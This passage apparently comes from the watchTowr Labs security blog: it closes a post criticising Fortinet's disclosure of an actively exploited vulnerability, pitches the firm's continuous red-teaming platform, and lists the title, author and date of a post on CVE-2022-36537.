watchTowr clients have benefitted from early testing and warning of devices in their environment that are vulnerable - but to our earlier point, it doesn't have to be the only way if Fortinet had been more forthcoming with helpful information in an actively exploited vulnerability.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

watchTowr Labs - Blog
Why It's Not Worth Goading Us On A Friday - CVE-2022-36537 At ScaleAliz Hammond
7 December 2022 at 23:45

Why It's Not Worth Goading Us On A Friday - CVE-2022-36537 At Scale

watchTowr Labs - Blog

By: Aliz Hammond

7 December 2022 at 23:45

[...]